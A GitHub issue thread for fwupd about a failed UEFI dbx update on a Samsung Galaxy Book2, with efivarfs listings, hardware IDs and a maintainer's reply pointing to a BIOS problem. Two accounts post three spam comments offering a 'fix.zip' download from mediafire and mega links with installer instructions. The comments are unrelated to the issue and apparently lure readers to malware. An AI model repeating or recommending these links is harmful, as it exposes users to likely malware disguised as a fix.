fwupd/fwupd #7645: Samsung Galaxy Book2: `failed to write data to efivarfs: Error writing to file descriptor: No space left on device`

StandingPadAnimations, 2024-08-24:
**Describe the bug**
When updating with `fwupdmgr`, I get an error about lack of space. 
```
Devices with no available firmware updates: 
 • Internal SPI Controller
 • MZVLQ512HBLU-00B
 • System Firmware
 • UEFI Device Firmware
╔══════════════════════════════════════════════════════════════════════════════╗
║ Upgrade UEFI dbx from 217 to 371?                                            ║
╠══════════════════════════════════════════════════════════════════════════════╣
║ Insecure versions of the Microsoft Windows boot manager affected by Black    ║
║ Lotus were added to the list of forbidden signatures due to a discovered     ║
║ security problem.This updates the dbx to the latest release from Microsoft.  ║
║                                                                              ║
║ Before installing the update, fwupd will check for any affected executables  ║
║ in the ESP and will refuse to update if it finds any boot binaries signed    ║
║ with any of the forbidden signatures.Applying this update may also cause     ║
║ some Windows install media to not start correctly.                           ║
║                                                                              ║
╚══════════════════════════════════════════════════════════════════════════════╝
Perform operation? [Y|n]: 
Writing…                 [                                       ]
failed to write data to efivarfs: Error writing to file descriptor: No space left on device
```

The thing is, I don't see any weird EFI variables that might be taking up space:
```
total 0
-rw-r--r-- 1 root root    12 Aug 24 16:54 $$_AcpiEnabled-01368881-c4ad-4b1d-b631-d57a8ec8db6b
-rw-r--r-- 1 root root    12 Aug 24 16:54 $$_Acpi_PTS-01368881-c4ad-4b1d-b631-d57a8ec8db6b
-rw-r--r-- 1 root root    12 Aug 24 16:54 $$_Acpi_WAK-01368881-c4ad-4b1d-b631-d57a8ec8db6b
-rw-r--r-- 1 root root    12 Aug 24 16:54 $$_EnterEfiShell-01368881-c4ad-4b1d-b631-d57a8ec8db6b
-rw-r--r-- 1 root root    12 Aug 24 16:54 $$_ExitBS-01368881-c4ad-4b1d-b631-d57a8ec8db6b
-rw-r--r-- 1 root root    12 Aug 24 16:54 $$_PowerOff-01368881-c4ad-4b1d-b631-d57a8ec8db6b
-rw-r--r-- 1 root root    18 Aug 24 16:54 $$_ReadyToBoot_GRCause-01368881-c4ad-4b1d-b631-d57a8ec8db6b
-rw-r--r-- 1 root root    12 Aug 24 16:54 $$_WDT_Clear-01368881-c4ad-4b1d-b631-d57a8ec8db6b
-rw-r--r-- 1 root root     8 Aug 24 16:54 AmiHardwareSignatureSetupUpdateCountVar-81c76078-bfde-4368-9790-570914c01a65
-rw-r--r-- 1 root root    28 Aug 24 16:54 AMITCGPPIVAR-a8a2093b-fefa-43c1-8e62-ce526847265e
-rw-r--r-- 1 root root    86 Aug 24 16:54 AMITSESetup-c811fa38-42c8-4579-a9bb-60e94eddfb34
-rw-r--r-- 1 root root     8 Aug 24 16:54 AmiWrapperSetup-c61c31a3-cb5d-46dd-9fe5-8a82bbc72483
-rw-r--r-- 1 root root    20 Aug 24 16:54 BiosGuardCapsuleVariable-368b3153-563d-4610-8d94-47a9fa8c4c16
-rw-r--r-- 1 root root   164 Aug 24 16:54 Boot0000-8be4df61-93ca-11d2-aa0d-00e098032b8c
-rw-r--r-- 1 root root   124 Aug 24 16:54 Boot0001-8be4df61-93ca-11d2-aa0d-00e098032b8c
-rw-r--r-- 1 root root    59 Aug 24 16:54 Boot0002-8be4df61-93ca-11d2-aa0d-00e098032b8c
-rw-r--r-- 1 root root    67 Aug 24 16:54 Boot0003-8be4df61-93ca-11d2-aa0d-00e098032b8c
-rw-r--r-- 1 root root    63 Aug 24 16:54 Boot0004-8be4df61-93ca-11d2-aa0d-00e098032b8c
-rw-r--r-- 1 root root     6 Aug 24 16:54 BootCurrent-8be4df61-93ca-11d2-aa0d-00e098032b8c
-rw-r--r-- 1 root root    16 Aug 24 16:54 BootMediaInfo-5bd6b672-b6ea-4d6a-b590-18a932b78794
-rw-r--r-- 1 root root     8 Aug 24 16:54 BootOptionSupport-8be4df61-93ca-11d2-aa0d-00e098032b8c
-rw-r--r-- 1 root root    14 Aug 24 16:54 BootOrder-8be4df61-93ca-11d2-aa0d-00e098032b8c
-rw-r--r-- 1 root root    12 Aug 24 16:54 BRDS-42780dd5-9a7d-404c-80e4-7f7094360394
-rw-r--r-- 1 root root   198 Aug 24 16:54 ConIn-8be4df61-93ca-11d2-aa0d-00e098032b8c
-rw-r--r-- 1 root root   198 Aug 24 16:54 ConInDev-8be4df61-93ca-11d2-aa0d-00e098032b8c
-rw-r--r-- 1 root root    34 Aug 24 16:54 ConOut-8be4df61-93ca-11d2-aa0d-00e098032b8c
-rw-r--r-- 1 root root    34 Aug 24 16:54 ConOutDev-8be4df61-93ca-11d2-aa0d-00e098032b8c
-rw-r--r-- 1 root root   893 Aug 24 16:54 CpuSetup-b08f97ff-e6e8-4193-a997-5e9e9b0adb32
-rw-r--r-- 1 root root    14 Aug 24 16:54 CpuSetupVolatileData-b08f97ff-e6e8-4193-a997-5e9e9b0adb32
-rw-r--r-- 1 root root     5 Aug 24 16:54 CurrentPolicy-77fa9abd-0359-4d32-bd60-28f4e78f784b
-rw-r--r-- 1 root root  4061 Aug 24 16:54 db-d719b2cb-3d3a-4596-a3bc-dad00e67656f
-rw-r--r-- 1 root root  4061 Aug 24 16:54 dbDefault-8be4df61-93ca-11d2-aa0d-00e098032b8c
-rw-r--r-- 1 root root 10476 Aug 24 16:54 dbx-d719b2cb-3d3a-4596-a3bc-dad00e67656f
-rw-r--r-- 1 root root 10160 Aug 24 16:54 dbxDefault-8be4df61-93ca-11d2-aa0d-00e098032b8c
-rw-r--r-- 1 root root    21 Aug 24 16:54 DebugConfigData-de0a5e74-4e3e-3d96-a440-2c96ecbd3c97
-rw-r--r-- 1 root root     8 Aug 24 16:54 DefaultBootOrder-45cf35f6-0d6e-4d04-856a-0370a5b16f53
-rw-r--r-- 1 root root     5 Aug 24 16:54 DeploymentModeNv-97e8965f-c761-4f48-b6e4-9ffa9cb2a2d6
-rw-r--r-- 1 root root    14 Aug 24 16:54 EfiDiagUsbVer-af0b8000-5156-401b-843f-f18a9acf67f7
-rw-r--r-- 1 root root    34 Aug 24 16:54 ErrOut-8be4df61-93ca-11d2-aa0d-00e098032b8c
-rw-r--r-- 1 root root    37 Aug 24 16:54 EWRD-92daaf2f-c02b-455b-b2ec-f5a3594f4aea
-rw-r--r-- 1 root root   164 Aug 24 16:54 FastBootOption-b540a530-6978-4da7-91cb-7207d764d262
[... 103 lines cut ...]
Please provide the version of the daemon and client.

```shell
fwupdmgr --version
```

Please note how you installed it (`apt`, `dnf`, `pacman`, source, etc):

<details>

<summary>**fwupd device information**</summary>

Please provide the output of the fwupd devices recognized in your system.

```shell
fwupdmgr get-devices --show-all-devices
```

</details>

**Additional questions**

- Operating system and version:
- Have you tried rebooting?
- Is this a regression?

StandingPadAnimations, 2024-08-24:
As some additional information, my laptop's UEFI settings don't allow for much, so I can't clear extra keys for example

diablo00001, 2024-08-25:
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

Zoraaa-z, 2024-08-25:
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

Zoraaa-z, 2024-08-25:
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

StandingPadAnimations, 2024-08-25:
What the...

hughsie, 2024-11-11:
This looks like a problem with your BIOS - it's not something we can fix in fwupd. If you give us the output of `sudo fwupdtool hwids` we can add this model to the blocklist for the dbx update.

StandingPadAnimations, 2024-11-11:
```
Computer Information
--------------------
BiosVendor: American Megatrends International, LLC.
BiosVersion: P07RGJ.068.220524.HC
BiosMajorRelease: 5
BiosMinorRelease: 25
FirmwareMajorRelease: ff
FirmwareMinorRelease: ff
Manufacturer: SAMSUNG ELECTRONICS CO., LTD.
Family: Galaxy Book2 360
ProductName: 730QED
ProductSku: SCAI-ICPS-A5A5-ADLP-PRGJ
EnclosureKind: 1f
BaseboardManufacturer: SAMSUNG ELECTRONICS CO., LTD.
BaseboardProduct: NP730QED-KA1US
Hardware IDs
------------
{ef6e2a40-0385-55c1-b421-5f70429407a0}   <- Manufacturer + Family + ProductName + ProductSku + BiosVendor + BiosVersion + BiosMajorRelease + BiosMinorRelease
{06d0fe38-0987-5ab3-8ffd-f72f725ac997}   <- Manufacturer + Family + ProductName + BiosVendor + BiosVersion + BiosMajorRelease + BiosMinorRelease
{0e1c3eed-ce29-5f4a-9cf4-7a9138851851}   <- Manufacturer + ProductName + BiosVendor + BiosVersion + BiosMajorRelease + BiosMinorRelease
{5886692b-6379-56fa-8a09-80be8830bc70}   <- Manufacturer + Family + ProductName + ProductSku + BaseboardManufacturer + BaseboardProduct
{83717d86-c481-5c75-b8a7-1ace7e3a18f8}   <- Manufacturer + Family + ProductName + ProductSku
{318815f4-9509-53b0-afeb-1163d1edc066}   <- Manufacturer + Family + ProductName
{ad3b06d4-2389-5141-a659-93a2f99d3554}   <- Manufacturer + ProductSku + BaseboardManufacturer + BaseboardProduct
{89a5540e-6f59-536c-86c4-e191a22fe905}   <- Manufacturer + ProductSku
{a7e06fed-4551-5ad1-9e2c-dd6ef3f73cb0}   <- Manufacturer + ProductName + BaseboardManufacturer + BaseboardProduct
{9f9405c3-2607-5785-bcc4-ffa8936b9f84}   <- Manufacturer + ProductName
{e63bd16b-3457-5d1f-8423-664750afdeaa}   <- Manufacturer + Family + BaseboardManufacturer + BaseboardProduct
{c4cd9095-8757-593c-8cbd-c7c281c699a7}   <- Manufacturer + Family
{9b89b548-4db3-5319-bd0e-f4275a833eef}   <- Manufacturer + EnclosureKind
{8fddbdbb-d948-52c1-99be-bc58cdd1d3e1}   <- Manufacturer + BaseboardManufacturer + BaseboardProduct
{ca0158e4-038b-5a84-8037-1b3cbf948d8a}   <- Manufacturer
Extra Hardware IDs
------------------
{8d12bbef-f9d9-5c0a-b145-8e27634815fc}   <- Manufacturer + Family + ProductName + ProductSku + BiosVendor
{5a5b6bcb-1ddf-50ff-b838-6e2c40f2703f}   <- Manufacturer + Family + ProductName + BiosVendor
{b78f6180-e9e7-5276-a663-335ab8100f3b}   <- Manufacturer + BiosVendor
```

closed 2024-11-15 by superm1